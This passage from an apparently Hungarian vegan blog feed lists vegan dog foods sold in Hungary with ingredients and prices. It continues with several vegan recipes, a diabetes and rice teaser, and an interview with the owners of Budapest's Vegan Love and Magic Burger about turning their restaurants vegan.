Tönköly 20%, burgonyafehérje, teljes kiőrlésű kukorica, árpa, napraforgóolaj, csillagfürt 5% élesztő (részben hidrolizált), kukoricafehérje, réparost, ásványi anyagok, almarost, borsóliszt (természetes aminosav-forrás), növényi fehérje (hidrolizált).
Adalékanyagok:
Tápértékkel rendelkező adalékanyagok:
A-vitamin (12.000 NE/kg), D3-vitamin (1.200 NE/kg), E-vitamin (130 mg/kg), B1-vitamin (10 mg/kg), B2-vitamin (15 mg/kg), B6-vitamin (15 mg/kg), B12-vitamin (70 mg/kg), C-vitamin (100 mg/kg), niacin (60 mg/kg), pantoténsav (40 mg/kg), folsav (4 mg/kg), L-karnitin (300 mg/kg), biotin (600 mcg/kg), taurin (1.000 mg/kg), vas (180 mg/kg), cink (160 mg/kg), mangán (16 mg/kg), réz (20 mg/kg), jód (2 mg/kg), szelén (0,25 mg/kg).
Kiszerelés: 15 kg
Ár/kg: 866 Ft
Itt rendelheted meg:
Zooplus.hu
Gabonamentes:
Világosbarna, hosszúkás szemek, zsírtartalma mint a Trainer Fitnessé. Ezt még nem próbáltuk, de nagyon szimpatikus az összetétele (a D3 vitamint leszámítva).
Összetevők:
Burgonya (szárított) (41,0%), borsóliszt (aminosavak természetes forrása) (14,0 %), burgonyafehérje, napraforgóolaj, élesztő (részben hidrolizált, ásványi anyagok, réparost, almarost (3,0%), növényi fehérje (hyidrolizált), cikóriagyökér (őrölt, természetes inulin-forrás), gyógynövények és gyümölcsök (málna, fodormenta, petrezselyem, kamilla, csipkebogyó, édesgyökér, arónia, görögszénamag, áfonya, körömvirág, édeskömény) (0,1%), alga, szárított (0,05%).
Adalékanyagok:
Tápértékkel rendelkező adalékanyagok:
A-vitamin (12.000 NE), D3-vitamin (1.200 NE), E-vitamin (130 mg), B1-vitamin (10 mg), B2-vitamin (15 mg), B6-vitamin (15 mg), B12-vitamin (70 mcg), niacin (60 mg), pantoténsav (40 mg), folsav (4 mg), L-karnitin (250 mg/kg), taurin (1000 mg/kg), biotin (600 mcg), C-vitamin (100 mg/kg), vas (180 mg), cink (220 mg), mangán (16 mg), réz (20 mg), jód (2,0 mg), szelén (0,3 mg).
Kiszerelés: 3 kg, 15 kg
Ár/kg: 1763 Ft vagy 1332 Ft
Itt rendelheted meg:
Zooplus.hu
Amidog
Már Magyarországon is kapható az Amidog és az Amicat (cicaeledel) egy vegán házaspár jóvoltából. Mi még sajnos nem próbáltuk. Két változata létezik, normál és kisméretű kutyáknak való.
- Állatkísérlet-mentes
- 100% vegán
Összetétel: kukorica, kukoricaglutén, kukoricaolaj, rizsfehérje, egész borsó, cukorrépapép, lenmag, bikalcium-foszfát, hidrolizált növényi fehérje, burgonyafehérje, sörélesztő, kalcium-karbonát, nátrium-klorid, repceolaj.
Analitikai összetétel: Nedvesség 8%, nyersfehérje 27%, nyerszsír 14%, nyersrost 2.9%, nyershamu 6.2%.
Tápértékkel rendelkező adalékanyagok: A-vitamin 26,000 IU/kg, D3-vitamin 1,350 IU/kg, E-vitamin 355 mg/kg, réz-szulfát pentahidrát (réz) 50 mg/kg, vas-karbonát (vas) 348 mg/kg, kalcium-jodát, anhydrous (jód) 25 mg/kg, nátrium-szelenit (szelén) 20 mg/kg, cink-oxid (cink) 160 mg/kg, mangán-oxid (mangán) 56 mg/kg, L-karnitin 300 mg/kg.
Kiszerelések:
– Normál: 3 kg, 12,5 kg
– Kistestű: 0,6 kg, 1,5 kg
Ár/kg:
– Normál: 2080 Ft, 1550 Ft
– Kistestű: 2833 Ft, 2457 Ft
Itt rendelheted meg:
AmiEgészség.hu
MultiFit Vega Krokett
A közismert kisállat-felszerelés bolt, a Fressnapf is árul saját márkás, vegetáriánus kutyaeledelt.
Összetétel: kukoricakeményítő (22,2%), rizs (16 %), takarmányrizs-liszt, takarmányborsó-liszt (12 %), árpa (10 %), kukorica (10 %), kukoricacsíra-olaj (2,8%), lenmag (2,2 %), monokalcium-foszfát, almatörköly, kalcium-karbonát, sörélesztő (szárított), sörélesztő-kivonat (hidrolizált), nátrium-klorid, kálium-klorid, lignocellulóz, cikóriapor.
Analitikai összetevők: fehérje 23%, zsírtartalom 9%, nyershamu 7%, nyersrost 3,2%, kalcium 1,10%, foszfor 0,90%.
Adalékanyagok/kg: táplálkozásfiziológiai adalékanyagok: A-vitamin 15000 NE, D3-vitamin 1500 NE, E-vitamin (all-rac-alfa-tokoferil-acetát) 150mg, C-vitamin (L-aszkorbinsav) 62mg, B1-vitamin 7,2mg, B2-vitamin 10,8mg, B6-vitamin 4mg, B21-vitamin 0,06mg, kalcium-D-pantotenát 20mg, niacin 45mg, biotin 0,4mg, folsav 1mg, Kolinklorid 800mg, L-lizin-mono-hidroklorid 575mg, réz (réz(II)-szulfát, pentahidrát) 13,5mg, vas (vas(II)-szulfát, monohidrát) 76mg, jód (kálium-jodid) 1,3mg, mangán (mangán(II)-oxid) 28mg, szelén (nátrium-szelenit) 0,3mg, cink (cink-szulfát, monohidrát) 135mg.
Kiszerelés: 2,5 kg és 12 kg
Ár/kg: 1120 Ft vagy 917 Ft
Hol veheted meg: Fressnapf
Trovet Exclusion
Ezt sem próbáltuk még, a feltüntetett logó szerint vegetáriánus táp allergiás kutyák részére, de 100% növényi eredetű alapanyagról írnak a weboldalon. Állatkísérleteket még nem tudom, végeznek-e, ezzel kapcsolatban megkérdeztem őket, update várható.
- hipoallergén
Összetevők: kukorica, szója fehérje koncentrátum, kukoricaolaj, ásványi sók, burgonyafehérje, rizs, pálmaolaj, cukorrépa-apríték, élesztőkivonat (hidrolizátum: manno oligoszaharidok forrása)
Analitikai összetevők: fehérje 21,5%, zsír 14%, szervetlen anyag 7,6%, rost 2%, nedvesség 8%, szénhidrátok 46,9%, A-vitamin 22250 IU/kg, D3-vitamin 2225 IU/kg, E-vitamin 100 mg/kg, kalcium 1,5%, foszfor 1%, nátrium 0,25%, kálium 0,67%, vas 132 mg/kg, réz 2 mg/kg, cink 86 mg/kg, mangán 31 mg/kg, jód 1,8 mg/kg.
Kiszerelés: 2,5 kg, 12,5 kg
Ár/kg: 2 480 Ft vagy 1 375 Ft
Itt rendelheted meg:
Petnet.hu
Zoofast.hu
Petissimo.hu
Nedves kutyaeledel, kutyakeksz, rágócsont
Yarrah Bio Vegetáriánus tálcás nedves táp
Nedves tápot általában nincs sok értelme adni a kutyusnak, mivel a szárazak nagyobb sűrűségben tartalmazzák ugyanazokat a tápanyagokat. Válogatós kutyáknak viszont jól jöhet, és új táphoz való átszoktatáskor is segíthet. Én csak kiegészítésnek használom.
Összetétel: Szója*, zöldségek (zöldborsó* 6.4%, sárgarépa* 1.6%), zöldségszármazékok*,olajok* (napraforgóolaj*), lestyán*, gyümölcsök* (csipkebogyó 0.2%), ásványi anyagok.
* = ellenőrzötten organikus forrásból, Skal 1301.
Ár: 1 790 Ft (6 x 150 g)
Itt rendelheted meg:
Zooplus.hu
Yarrah Bio kutyakeksz
Szintén a Yarrah Bio terméke ez a kutyakeksz, amit csak úgy nasinak szokott kapni a kisöreg.
Összetétel: gabona* (búza*, kukorica*), cukor* (glükóz szirup kukoricából*), olajok* (napraforgó olaj*), ásványi anyagok.
* = from controlled organic farming sources, Skal 1301.
Kiszerelés: 250 g
Ár: 850 Ft
Itt rendelheted meg:
Zooplus.hu
Trixie Veggies
Összetevői alapján ez a fogápoló rágócsont vegán, de sajnos tartalmaz mesterséges adalékanyagokat, emiatt csak ritkán veszem. Több méretben kapható, Tódi szereti.
Összetevők:
Kukorica keményítő, búzaliszt, glicerin, klorofill, élesztő, só, malátacukor.
Adalékanyagok:
Tartósítószerek és színezékek.
Ár: 590 Ft
Itt rendelheted meg:
Zooplus.hu
Dein Bestes Fogkefe
A DM-nek is van saját márkás, vegán “kutyafogkeféje”, a Dein Bestes Fogkefe Kutyáknak. Összetétele egyszerű, a 6 db-os csomagban kétféle színű, fogkefe alakú rágóka van. Színezéket ez is tartalmaz. Tódi ennek ellenére szívesen rágcsálja.
Összetevők: Gabonák, növényi melléktermékek, élesztő.
Adalékanyagok: színezékek.
Itt vásárolhatod meg: DM drogériák
Ha te is ismersz más, vegán kutyatápokat, vagy kipróbáltátok a fent felsoroltakat, ne habozz, írd meg nekem az info@veganinja.com címre!
A házi készítésű vegán kutyaételekről ebben a cikkben most nem volt szó, de a jövőben talán még foglalkozom a témával.
The post Magyarországon kapható vegán kutyaeledelek appeared first on VegaNinja.
Vajon a fehér rizs hibáztatható az ugrásszerűen megnövekvő 2. típusú cukorbetegségért Kínában?
2016. augusztus 28. Vegangster
A rizs alap élelmiszer már vagy 5000 éve, de néhány új tanulmány és hír arra utal, hogy minden további napi adag növeli a kockázatát a 2. típusú cukorbetegség kialakulásának nem kevesebb, mint 11 százalékkal.A Nutritionfacts.org alábbi videójában Dr. Michael Greger felülvizsgálja a fehér rizs fogyasztása és a 2. típusú cukorbetegség terjedésének kapcsolódását, főként az ázsiai populációk esetében. A sebesség, amellyel az emberek Kínában és Japánban egyre inkább érintetté válnak a cukorbetegség
Póréhagymás chilis babbal töltött édesburgonya
2016. augusztus 21. Vegán muflon
Mint tudjuk, a pusztán növényi alapú táplálkozás követői nem jutnak elegendő fehérjéhez, vitaminhoz és egyéb tápanyagokhoz. Így hát elkerülhetetlenül megvakulnak, végtagjaik elsorvadnak, majd bőrizomtömlőt növesztve egy ótvaros veteményesben fogják leélni életüket, míg ki nem végzi őket egy rotációs kapa. Nos, ezen sorok írójának testfelépítése több szempontból nem felel meg a gilisztáénak. (Ezt épp ma reggel ellenőrizte a fürdőszobatükörben, onnan tudja.) Képes pl. gépelni, amit gilisztaként csak akkor tudna megtenni, ha megdögölne, megkeményedne, és valaki nyomkodná vele a klaviatúrát. Nos, ezt a gusztusos bevezető csak azért kívánkozott ide, mert a következő műalkotás kivételes mennyiségű fehérje- és vitamincunamit vonultat fel, és ha kedvünk tartja, egy-egy táplálkozásról szóló vita hevében bármikor betömhetjük vele a minket győzködő tudatlanok szájnyílását.
Ingrídiönz:
2 drabális méterű édesburgonya (vagy 4 db közepesebbecske) 400 g vörösbab (konzerves) 400 g fehérbab (szintúgy) 400 g aprított paradicsom (megintcsak)1,5 dl paradicsompüré 150 g füstölt tofu (elhagyható, de ne hagyjuk el!) 1 póréhagyma 2 gerezd fokhagyma 1 ek füstölt paprika 2 tk őrölt kömény 1/2 tk cayenne bors 1 db avokádó
A sütőt kijelentő módban előmelegítsük 200 fokra. A megmosott édesburgonyákat egy villával megszurkáljuk, majd héjastól (aki meghámozza, annak denevért teszek a pizsamájába!) 45 percre sütőbe tesszük. Közben nekilátunk a chilinek: a póréhagymát felkarikázzuk, és kevés olívaolajon megpároljuk. Cicázás nélkül hozzápasszítjuk a felaprított fokhagymát, a fűszereket, majd paradicsomkonzervet és a pürét, majd az összetört tofut. Jó tíz percig pároljuk tapasztaltan, türelmesen, majd hozzáadjuk a lecsepegtetett babot. További tíz percig tutujgatjuk, kevergetjük közepes lángon. A sült édesburgonyába hosszában egy hasadékot vágunk, majd megtöltjük a chilis babbal és a héjájól megfosztott, felkockázott avokádóval.
Vegán carbonara spagetti recept, ami egyszerű, mint az 1×1
Édesanyám mindig nagy örömmel készít nekem vegán ételeket, mikor meglátogatom a szülői házat. Nemrégiben megkértem, hogy találjon ki nekem egy vegán carbonara spagetti receptet, hiszen nem ettem ilyet már legalább 4 éve. Azóta, mióta vegán vagyok. A végeredmény fantasztikus lett, pont olyan, amilyenre emlékeztem, így most az ő receptjét olvashatod. Hozzávalók: 1/2 csomag tojásmentes spagetti 1 csomag növényi felvágott 400 ml (2 doboz) növényi tejszín 1 evőkanál kókuszolaj 1 evőkanál sörélesztő pehely só bors A felvágottat apró kockákra vágjuk, az olajon illatosra pirítjuk, majd picit sózzuk és borsozzuk. Hozzáadjuk a sörélesztő pelyhet és a növényi tejszínt. Összefőzzük. A tésztát sós vízben megfőzzük , majd leszűrjük. Belekeverjük a szószba, és jól összedolgozzuk. Jó étvágyat! loading... var SC_CId = 170598,SC_Domain=n.ads1-adnow.com;SC_Start_170598=(new Date).getTime(); The post Vegán carbonara spagetti recept, ami egyszerű, mint az 1×1 appeared first on VegaNinja.
Szeretnénk vezekelni a Magic Burger miatt – Vegan Love interjú
2016. augusztus 14. Vegán lettem
Számos támadás érte Budapest egyik újdonságának számító vegán street fooderét a Vegan Love-ot. Kellemetlen kérdések, üdítő válaszok: Vegan Love interjú.
Amikor egy vegán étterem olyan hype-ot kap még nyitás előtt , mint a Vegan Love, akkor bizony az ember fia feltételezi, hogy nem amatőrök nyitják és kíváncsian elkezd kutakodni kilétük felől. Nem kellett sok ahhoz, hogy az eddigi legnagyobb vegán piaci paradoxon felálljon a szemem előtt, ugyanis kiderült, hogy a Vegan Love éttermet a Magic Burgeres páros nyitja. Ez az ellentmondás komoly ellenszenvet váltott ki úgy bennem is, ahogy sok más vegánban. Számos helyen fejtettem ki véleményem az ügy pozitív és negatív oldalát egyaránt hangoztatva, majd pár személyes beszélgetés után megérett az igény, egy a témát és a páros valódi érzéseit bemutató interjúra.
Mióta foglalkoztok vendéglátással?
Lilla: 6 és fél éve kezdtük el a vendéglátózást a Magic Burgerrel egy büfékocsiban, majd 3 év után nyitottuk meg az első éttermünket. Amikor megnyílt a Magic Burger én már vegetáriánus voltam. Peti akkor még húst hússal evett és minden álma egy hamburgerező volt, így abban maradtunk, hogy ő elkészíti a normál hamburgereket én pedig kidolgozom a vega burgereket.
Péter: Ahogy Lilla mondta én voltam a megrögzött húsimádó. Rosszul éreztem magam, ha egy napig nem ehettem húst, steaken és burgeren éltem gyakorlatilag. A célom annyi volt, hogy jó minőségű ételeket adjunk az embereknek és ez akkor elégnek is tűnt nekem. Ugyan Lilla vega volt, de a veganizmus nem volt ennyire elterjedt, illetve nem volt ennyi csatorna, ahonnan az infókat kaphattuk volna és én nem is tudtam akkoriban, hogy mi az a vegán.
Hogyan kerültetek akkor kapcsolatba a veganizmussal?
Lilla: Élesben először akkor találkoztunk a veganizmussal, amikor jött két amerikai aktivista a PETA-tól, akiknek én voltam a budapesti vezetőjük. Lindsay és Nicole 2006 körül azért voltak itt, hogy a Westendnél testfestéssel tiltakozzanak a szőrmeviselés ellen. Ez akkor számunkra és úgy egyáltalán itt Magyarországon egy szokatlan dolog volt, de az itt létük kevés ideje alatt realizálódott bennünk a segítségükkel, hogy mit jelent a veganizmus. Ennyi számomra elég volt ahhoz, hogy eldöntsem a vegetarianizmus nem elég, vegánnak kell lennem. Akkoriban ez még egy kicsit más volt és sokkal nehezebbnek tűnt. Nem nagyon lehetett vegán háztartási cikkeket kapni és lényegében főzhettem rizst répával aztán annyi.
Péter: Igen az a pár nap komoly hatással volt ránk. Az ezt követő időszakban Lilla sokat morfondírozott az átálláson, majd a Magic Burger megnyitását követő években egyre keményebben bombázott a vegán ideológiával. Egyre többet jártunk vegán helyekre és folyamatosan mutogatta nekem az aktuális videókat. Viszont ami nagyon fontos volt emellett, hogy kialakult egy komolyabb egészségügyi probléma a gyomrommal, ami akkor erősödött amikor húsokat ettem. Egy idő után rá kellett jönnöm, hogy semmilyen állati eredetű étel nem tesz jót nekem. Így napról napra, hétről hétre elkezdtem elhagyni a húsos és állati eredetű ételeket. Tehát én első körben az egészségem miatt, magam miatt hagytam el mindent, de egy idő után ez bennem is átalakult egy etikus döntéssé és ideológiává Lilla segítségével. Elég volt, ha arra gondoltam, hogy otthon van egy csomó kutyánk, macskánk, miért lennének a levágandó állatok mások, mint ők? Ezelőtt, a vegán témájú videókat ugyanúgy elutasítóan kezeltem, ahogy mindenki, majd amikor már elért egy kritikus szintet bennem az információ, akkor beütött. Pontosan emlékszem, hogy egyszer rászántam magam és megnéztem a PETA egyik 20 perces videóját, amiben az utca emberének mutatják a vágóhídi és egyéb állatipari videókat. Először csak az emberek reakcióit mutatják , ahogy sírnak és elrántják a fejüket, majd azt vetítették le amit ők is láttak.
Kőkemény, tömény és kegyetlen kaszabolás, vágohídi és tejipari kínzás és szenvedés. Akkor döntöttem 100 %-osan a veganizmus és az állatjog mellett.
Illetve bocsánat, amíg a Magic Burgert jelen formájában üzemeltetjük, addig csak növényi alapú étkezésről beszélhetünk.
Ezek után joggal merül fel a kérdés bennem, hogy milyen érzés bejárni a Magic Burgerbe dolgozni?
Lilla: Számomra a Magic Burger a nyitástól kezdve egy paradoxon volt. Egyrészről nagyon örültem a sikereinknek, másrészről egyre szarabbul éreztem magam. Egyre sűrűbben mondtam Péternek, hogy én ezt hosszú távon nem leszek képes csinálni. Sok vita volt ebből otthon, de valahol mind a ketten tudtuk, hogy nem ez a célállomás.
Számos cikk állította rólatok, hogy vegánok vagytok. Ti hogyan vélekedtek?
Péter: A Magic Burger miatt nem lehetünk azok, ez egyértelmű és minden interjúban elmondtuk, hogy ne írják rólunk ezt. Pontosan tudjuk mit jelent a veganizmus és nem szeretnénk sem magunkból ,sem a kifejezésből karikatúrát csinálni. Ennek ellenére volt aki leírta, de ezzel nem tudunk mit kezdeni. Főleg, hogy ezek nem fizetett cikkek voltak így nem is nagyon szólhattunk bele a tartalmába. Válaszoltunk a feltett kérdésekre ők pedig megírták, ahogy ők látták.
Sokan támadnak azzal is, hogy csak a pénz miatt csináljátok a Vegan Love-ot.
Péter: Ehhez csak annyit hadd szóljak, hogy ha valóban a pénz érdekelt volna minket, akkor nem a veganizáláson gondolkozunk, hanem nyitunk még 2-3 Magic Burgert, ami ötször-tízszer annyi pénzt hozott volna, mint amire a Vegan Love képes lesz az elkövetkezendő években.
Lilla: Emellett konkrétan háromszor annyiba került a Vegan Love megnyitása, mint a Magic Burger jóval nagyobb üzletének a megnyitása és az sem egy utolsó szempont, hogy a Vegan Love esetében egyelőre épphogy nullára jön ki a matek és a Magic Burger tartja el. Szóval hihet akárki akármit, egyelőre ez nem éri meg.
A most hallottak alapján vegyesek, de inkább negatívak az érzelmeitek a Magic Burgerrel. Mi lesz a sorsa?
Lilla: A negatív érzelem kizárólag a húsokhoz és az állati eredetű alapanyagokhoz fűződik. Az éttermet, a rendszert amit fejlesztettünk, a vendégeinket, a dolgozóinkat, a konkrét munkát a mai napig imádjuk.
Az az álmunk, hogy ugyanezt csinálhassuk ugyanezeknek a vendégeinknek, ugyanott, de hús, tojás, tejtermékek nélkül.
Volt egy nagyon nehéz korszakunk körülbelül 2 éve, amikor már mindketten erősen veganizálódtunk. Egyik este úgy mentünk haza, hogy nagyon tele volt a hócipőnk a Magic Burgerrel és szóba került, hogy eladjuk a céget. Aztán gyorsan rájöttünk, hogy ez nem lenne megoldás, mert ebben az esetben valaki ugyanezt folytatná és állatok ezrei halnának meg továbbra is. Ugyan lett volna pénzünk, de semmilyen pozitív hozadékát nem láttuk annak, hogy valaki még 10 évig tonnaszámra árulja a húsokat. Nagyon sokat gondolkodtunk azon, hogy hogyan tovább úgy, hogy az igazán jó legyen. Simán el is adhattuk volna és nyithattunk volna egy vegán hamburgerezőt. Ez lett volna az egyszerűbb út, de nem ezt választottuk.
Péter: Egy idő után az tisztává vált, hogy a Magic Burgert átalakítjuk. Azt még nem tudtuk akkor, hogyan vezetjük rá a vendégeinket, hogy mennyire rohadt jó lesz nekik, ha vegán hamburgereket esznek, de a végső célunk ez. Lényegében amellett döntöttünk, hogy az étlapot szépen lassan átalakítjuk, és folyamatosan levesszük a húsos kajákat, melyeket vegán kajákkal helyettesítünk. Ha bemész a Magic Burgerbe már azt látod, hogy elég egyszerű módon az étlap fele le van ragasztva, három féle húst teljesen megszüntettünk, a sajtok nagy részét levettük az étlapról, amelyeket vegán sajtokkal fogjuk helyettesíteni, a nem vegán tönkölyös bucinkat pedig megcsináltattuk úgy, hogy vegán legyen. Hogyha pedig átfordul úgy az arány, hogy a vegán burgereket eszik többen, akkor az egyik rostlapot csak és kizárólag vegán ételek elkészítésére használjuk majd, hogy a vegánoknak és vegetáriánusoknak is megfeleljen.
És így fogunk szépen lassan addig haladni, amíg a Magic Burger is vegán hamburgerező lesz.
Szerintem ennél jobban nem oldhatjuk meg azt, hogy a húsevő vevőinket megtartsuk úgy, hogy egyre kevesebb húst egyenek, illetve nálunk egyáltalán ne egyenek semmilyen állati eredetű ételt.
Lilla: Egyébként a Magic Burger facebookjával már nem is foglalkozunk igazán egy ideje, nem írunk bejelentkező hosszú posztokat sem. Nem volt már kedvünk. Ez egy idő után nagyon kellemetlen volt, főleg a vendégek miatt és pont nemrég tettünk ki egy posztot a várható változásokól.
Amikor felvesztek valakit kikötés, hogy vegán legyen?
Lilla: Nem. Több okból sem. Az egyik, hogy törvényellenes így feladni hirdetést. A másik, hogy ahogy a Magic Burgernél is, úgy ezen a vonalon is a célunk, hogy megmutassuk az alternatívát olyanoknak, akik még nem találkoztak vagy csak ismerkednek a veganizmussal. Körülbelül 30-an dolgozunk most a cégnél és kőkeményen bombázzuk az összes alkalmazottunkat a veganizmussal. Azokon a napokon, amikor a dolgozóink a Vegan Love-ba vannak beosztva, természetesen nem hoztatnak be az étterembe állati eredetű ételt, viszont nyilván az aznapi ebédjét úgyis a vegán étlapról választja, így az az étkezése már növényi alapú, már ezzel is nyertünk egy kicsit. Emellett mindenki kap tőlünk vegán tájékoztató könyvet és bizony már van olyan alkalmazottunk, aki emiatt vegán lett, valamint többen a vegává válás útjára léptek. Szóval az ügy szemszögéből sokkal hatásosabbnak tartom nem vegánokat alkalmazni.
Többen drágállják a Vegan Love árait.
Péter: Ezt azzal a tévhittel kötném össze, miszerint sokan úgy gondolják, hogy a húsos burgerek drágábbak, mert a zöldség alapvetően olcsóbb. De ez a mi esetünkben nem igaz, mert olyan alapanyagokból dolgozunk melyek jóval drágábbra jönnek ki hamburgerenként, mint a Magic Burger esetében. Az alapanyagaink 40-50%-a bio és a sajt amit használunk pedig szigorúan Violife.
Lilla: Emellett sokkal több munka van egy vegán hamburgerrel, mint egy húsossal. A vegánban nem nagyon használunk készételeket alapanyagnak, szinte mindent mi gyártunk, még a szójatejet is. Amíg a Magic Burgerben öt ember elvisz egy hétfőt kényelmesen, addig a Vegan Love-ban ugyanannyi ember megszakad. Ezt úgy képzeld el, hogy a Vegan Love-ban minden receptünk 10-15 összetevős, ezáltal ötször annyi idő elkészíteni az ottani alapanyagokat, mint a Magic Burgerben. Lényegében az alkalmazottak egész nap recept szerint gyártják le a burgerekhez és hotdoghoz valókat.
Honnan szerzitek be az alapanyagokat?
Péter: Körülbelül 40 beszállítóval dolgozunk és nagyon változatos helyekről érkeznek az alapanyagok, viszont igyekszünk egyre több mindent mi elkészíteni. A tejektől kezdve a szószokon át már minden saját. Ez alól kivétel a sajt egyelőre, az nagy falat lenne. De tervben van a sajt is, illetve a saját tofu és saját szejtán készítése is, csak egyelőre az a problémánk, hogy nagyon kicsi a Vegan Love konyhája. Nincs elég hely és ezáltal kielégítő infrastruktúra sincs.
Mi a véleményetek a magyar vegán szcénáról?
Péter: Érzésem szerint erősen kettészakad a vegán társadalom. Van egy nagyon radikális része és van egy elfogadóbb, befogadóbb része. Mindig amikor látom egyik-másik oldalt, az a kérdés fogalmazódik meg bennem, hogy melyikkel érhetünk el nagyobb előrelépést és egyértelműen mindig az utóbbinál kötök ki.
Lilla: Az igazán radikális elemekkel nem találkoztam még soha élőben. Mindig csak facebookon látom őket.
Sokan nagyon ellenzik a húsutánzatok készítését. Hogy álltok ehhez a kérdéshez?
Péter: Amikor a fejeket 30 évig húszabálásra kondicionálják, akkor ha nem adsz nekik gumicsontot, sokkal könnyebben visszakattanhatnak a húsra. Így van lehetőséged pótolni a megszokott kajákat.
Mit jelent nektek a veganizmus?
Péter: A lehetőségekhez mérten legkevesebbet árts az állatoknak. Tudom, hogy a definíciója nem ez, de nagyon sokan más és más szakaszában vannak ennek az útnak és feladatomnak érzem, hogy segítsem őket.
Lilla: Mi azt valljuk, hogy vannak a vegánok és a még nem vegánok. Támogatunk mindenkit és információt próbálunk átadni annak érdekében, hogy ez az arány egyre gyorsabban átforduljon.
Péter: Igen egészen konkrétan megpróbáljuk minél több vegyes táplálkozásúnak megmutatni az utat minden eszközzel ami a kezünkben van, akár a nehezebb utakat is választva. Így szeretnénk vezekelni a Magic Burger miatt.
Milyen újítással készültök a Vegan Love-ban?
Péter: Szeretnénk becsempészni a kínálatba nyers ételeket. Nyers hamburger, nyers hotdog, nyers köretek. Ez a következő misszió.
Fenntarthatóság?
Lilla: Hirtelen váltás. (nevet) A Vegan Love-ban szelektíven gyűjtjük a szemetet, már amennyire a lehetőségek engedik és a műanyag pohárról most váltunk kukoricapohárra. Palackozott üdítőket nem tartunk és az üdítők, amiket csinálunk, tisztított vízből készülnek. Otthon is igyekszünk mindent megtenni annak érdekében, hogy minél kevesebbet ártsunk. Van egy hatalmas komposztálónk, ahova a szerves hulladékot dobjuk, valamint az esővizet is gyűjtjük, amivel a kutyákat itatjuk és ezzel locsolunk.
Említettétek, hogy kutyákkal és macskákkal éltek együtt. Mennyi van egészen pontosan és hogy kerültek hozzátok?
Péter: Mindketten imádjuk a kutyákat, Lilla pedig a cicákat is, annyira, hogy már belőlük is van 5. Egyébként 6 kutyánk van. Az első kutyámat úgy fogadtam be, hogy besétált az akkori barátnőm sulijába, ő pedig hazahozta. Ő ma már 16 éves, és elég rossz állapotban van, de keményen küzdünk, hogy minél tovább együtt maradhassunk.
Lilla: Az összes többi állat is mind örökbefogadott és befogadott, vagy menhelyről vagy gyepmesteri telepről vagy utcáról, vagy ahonnan éppen jött. Az első saját kutyusomat 10 éve találtam az M0-ás mellett szilveszter utáni reggelen. Lényegében szaladt volna be az autók közé annyira meg volt rémülve.
Péter: Az elsők után szerettünk volna még közös kutyusokat, melynek csak a közös ház hiánya volt az akadálya. Aztán másfél éve összeköltöztünk és akkor fogadtuk örökbe a másik 4 kutyust is, közben pedig be-be csúszott pár cica.
Növényi táplálkozásúak a négylábú lakótársaitok?
Péter: Nagyon sokáig próbálkoztunk mindenfélével és a legöregebb kutyán kívül mindegyik vegánul táplálkozik. A fiatalabb kutyusok kicsattannak a vegán tápoktól.
Lilla: A cicáimmal is kb ugyanez a helyzet. A fiatalabbak tökéletesen átálltak és makk egészségesek, az öregebb macska már nem kultiválta a váltást.
Foglalkoztok aktívan állatmentéssel is?
Lilla: Nem. Nincs rá időnk. Viszont ismerünk állatmentőket, akik tudják, hogy ha nagy gáz van akkor nekünk tudnak szólni. Például, ha egy állatot el kell vinni Hajdúböszörményből Vácra egy kórházba, akkor minket is szoktak hívni.
Péter: Ezt fuvarnak hívják. Vannak olyan segítők, akik csak a szállításban tudnak segíteni és az állatot elviszik A-ból B-be. De ezekért a fuvarokért általában pénzt kérnek. Mi úgy döntöttünk, hogy mivel kocsink és emberünk is van, így ebben tudunk segíteni és segítünk is.
Ha egy adott étel lehetnétek, ami a legjobban meséli el, hogy ti milyenek vagytok, melyik lenne az?
Péter: Barbeque Tofu Burger. Fűszeres, édeskés és jól lehet téríteni vele. (nevet)
Lilla: Chili Dog. Mert csípős, mint én.
Köszönöm az interjút és sok sikert!
A Vegan Love-ot megtalálhatjátok a weben és a facebookon is.
Sárgadinnye mojito
A múltkori partira szerettem volna valami igazán különleges frissítőt. Úgy tudnak örülni a vendégek, ha rögtön mindenki kap egy welcome drinket! Van mit szorongatni a hangulat bemelegedéséig, no, meg persze szomjas is az ember, amikor megérkezik valahová, és az sem elhanyagolható, hogy az üres gyomroknak milyen jól esik egy kis gyorsan felszívódó édes gyümölcs. :)
Szóval, ezt a mojitót gondoltam ki, ami nem más, mint a megszokott limonádé gyümölcskockákon egy kis mentalevéllel. Azért nem kevertem előre össze, hogy a hagyományosabb ízek kedvelői akár külön-külön is kérhessék.
Legalább az elsőt. ;)
Hozzávalók 2-3 nagy pohárhoz:
[...] Bővebben!
Málnás-brazil diós quinoa
A receptet és az ételt egyedivé teszi a paradió, másnéven brazil dió. Aránylag kevés receptet látok a magyar gasztroszférában paradióval. Leginkább diákcsemegékben találkozhatunk vele. Meglehetősen sok kalciumot, káliumot, magnéziumot, vasat, foszfort és meglehetősen jelentős szelént tartalmaz, no és zsírt. Mintegy 60-70%-a zsír, ezért óvatosan fogyasszuk. Magas szeléntartalmának köszönhetően pajzsmirigy-betegek számára jótékony hatású.
Brazildió fák szinte kizárólag érintetlen őserdőkben hoznak gyümölcsöt. Nagyüzemi termesztése sehol sem sikerült, mivel hiányoznak a virágok beporzásához szükséges méhek és más rovarok. Csak néhány erre a virágra specializálódott rovar képes a beporzásra. Megporzás után a termés, csak 14 hónap után érik meg. A termés nagy, 10-15 centiméter átmérőjű, gömbölyű, csonthéjas tok, melyben 8-24 darab háromszög alakú és 4-5 centiméter hosszú mag található. A tok fás héja 8-12 milliméter vastag.
Másik érdekesség, hogy egy a brazildió fán élő orchidea illata vonzza a fához a méheket. A természet e komplex megoldása nélkül a fa nem hoz termést. A fa szaporodása is különleges. Termésének vastag héját csak egy őserdei rágcsáló, az aguti képes feltörni. A magokat a mókusokhoz hasonlóan elraktározza, és a rejtekhelyeket gyakran elfelejti. Ezekből az őserdőben elszórt raktárokból kelnek ki az új fák. Ha az elültetett helyen nincs elég napfény, a kis növény, évekig is várhat amíg kicsírázik.
Habár az egyik neve brazíldió, a legtöbb paradiót Bolíviában gyűjtik be, körülbelül a világszintű termés 50%-át. Brazíliában 40%-ot és Peruban 10%-ot.
A recept
Hozzávalók:
- 20 dkg quinoa
- 5 dl növényi tej (nekem szójatej volt otthon)
- 1 nagyobb bögre málna (akár fagyasztott is lehet)
- 1kis marék brazil dió (paradió)
Elkészítés:
